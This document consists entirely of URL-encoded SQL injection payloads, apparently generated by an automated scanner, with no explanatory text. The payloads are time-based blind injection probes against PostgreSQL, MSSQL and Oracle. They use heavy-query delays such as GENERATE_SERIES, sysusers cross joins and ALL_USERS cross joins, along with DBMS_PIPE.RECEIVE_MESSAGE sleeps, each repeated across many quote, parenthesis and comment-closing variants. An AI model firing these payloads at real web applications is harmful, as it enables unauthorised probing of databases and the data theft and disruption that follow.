-7961%27%29%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27cesM%27%20LIKE%20%27cesM -5426%27%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27HkNH%27%20LIKE%20%27HkNH -1635%22%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22EnzA%22%3D%22EnzA -1754%22%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22vjJN%22%3D%22vjJN -6577%22%29%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22MYdM%22%3D%22MYdM -4608%22%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22lfoJ%22%3D%22lfoJ -3966%22%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22MGji%22%20LIKE%20%22MGji -5063%22%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22gXOS%22%20LIKE%20%22gXOS -2637%22%29%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22jHfv%22%20LIKE%20%22jHfv -5062%22%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22uRxP%22%20LIKE%20%22uRxP -5475%25%27%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27%25%27%3D%27 -1774%25%27%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27%25%27%3D%27 -5083%25%27%29%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27%25%27%3D%27 -5232%25%27%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27%25%27%3D%27 -6804%00%27%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27OLiC%27%3D%27OLiC -2453%00%27%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27phnI%27%3D%27phnI -3541%27%29%20WHERE%202910%3D2910%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -2914%22%29%20WHERE%201366%3D1366%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -1040%29%20WHERE%205151%3D5151%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -1175%27%20WHERE%207167%3D7167%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -1626%22%20WHERE%202579%3D2579%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -6819%20WHERE%208483%3D8483%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -8145%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -3115%27%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -1723%27%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -1980%22%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -7011%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%283522%3D3522 -1501%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%284799%3D4799 -4098%29%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%285600%3D5600 -4186%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -2767%27%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27HyJD%27%3D%27HyJD -8872%27%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27nyqC%27%3D%27nyqC -2240%27%29%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27ynoZ%27%3D%27ynoZ -3372%27%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27ZiVE%27%3D%27ZiVE -9660%27%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27dFew%27%20LIKE%20%27dFew -7140%27%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27snXt%27%20LIKE%20%27snXt -6791%27%29%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27GDiy%27%20LIKE%20%27GDiy -5484%27%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27iNpN%27%20LIKE%20%27iNpN -8837%22%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22GWIr%22%3D%22GWIr -3120%22%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22Tweb%22%3D%22Tweb -5026%22%29%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22Qfvw%22%3D%22Qfvw -7722%22%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22RcLW%22%3D%22RcLW -8723%22%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22qSJz%22%20LIKE%20%22qSJz -2050%22%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22yaOg%22%20LIKE%20%22yaOg -8437%22%29%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22qzgz%22%20LIKE%20%22qzgz -9008%22%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22TYuS%22%20LIKE%20%22TYuS -9294%25%27%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27%25%27%3D%27 -6479%25%27%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27%25%27%3D%27 -8571%25%27%29%29%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27%25%27%3D%27 -3155%25%27%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27%25%27%3D%27 -8870%00%27%29%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27IQaq%27%3D%27IQaq -6268%00%27%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27yzoz%27%3D%27yzoz -6193%27%29%20WHERE%202475%3D2475%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -1228%22%29%20WHERE%206659%3D6659%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -2487%29%20WHERE%205960%3D5960%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -4988%27%20WHERE%205193%3D5193%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -8610%22%20WHERE%203988%3D3988%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -8819%20WHERE%208894%3D8894%20OR%205577%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -4786%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29 -5158%27%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29 -9464%27%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29 -6209%22%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29 -6600%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%288943%3D8943 -1457%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%288843%3D8843 -7780%29%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%286506%3D6506 -2906%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29 -2425%27%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%27ytCH%27%3D%27ytCH -6034%27%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%27rvIC%27%3D%27rvIC -2911%27%29%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%28%27tlkG%27%3D%27tlkG -3143%27%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%27ukac%27%3D%27ukac -5103%27%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%27cSGv%27%20LIKE%20%27cSGv -6736%27%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%27CKtE%27%20LIKE%20%27CKtE -8968%27%29%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%28%27ncqc%27%20LIKE%20%27ncqc -4196%27%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%27HzpN%27%20LIKE%20%27HzpN -9723%22%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%22xqmY%22%3D%22xqmY -4573%22%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%22xXAD%22%3D%22xXAD -5191%22%29%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%28%22Tujn%22%3D%22Tujn -5336%22%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%22Upyw%22%3D%22Upyw -4811%22%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%22WYpG%22%20LIKE%20%22WYpG -3766%22%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%22DpCh%22%20LIKE%20%22DpCh -3169%22%29%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%28%22YNmR%22%20LIKE%20%22YNmR -2719%22%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%22bZNu%22%20LIKE%20%22bZNu -6144%25%27%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%27%25%27%3D%27 -7416%25%27%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%27%25%27%3D%27 -3195%25%27%29%29%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%28%28%27%25%27%3D%27 -6724%25%27%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%27%25%27%3D%27 -6836%00%27%29%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%28%27dAyc%27%3D%27dAyc -6518%00%27%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20AND%20%27afdd%27%3D%27afdd -7149%27%29%20WHERE%208696%3D8696%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20--%20 -6158%22%29%20WHERE%205976%3D5976%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20--%20 -2952%29%20WHERE%202768%3D2768%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20--%20 -9593%27%20WHERE%207304%3D7304%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20--%20 -4437%22%20WHERE%202998%3D2998%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20--%20 -8096%20WHERE%201902%3D1902%20OR%201367%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2882%29%7C%7CCHR%28101%29%7C%7CCHR%2897%29%2C5%29%20--%20 -3810%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -2330%27%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -8998%27%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -4869%22%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -7545%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%283671%3D3671 -1892%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%288420%3D8420 -7110%29%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%282822%3D2822 -9011%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -8782%27%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27fFCb%27%3D%27fFCb -5952%27%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27yGep%27%3D%27yGep -6203%27%29%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27DakB%27%3D%27DakB -2878%27%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27ENit%27%3D%27ENit -4244%27%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27gmjm%27%20LIKE%20%27gmjm -6607%27%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27ipac%27%20LIKE%20%27ipac -5234%27%29%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27OsZr%27%20LIKE%20%27OsZr -5912%27%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27XiZe%27%20LIKE%20%27XiZe -8436%22%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22CUFN%22%3D%22CUFN -7289%22%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22zXlv%22%3D%22zXlv 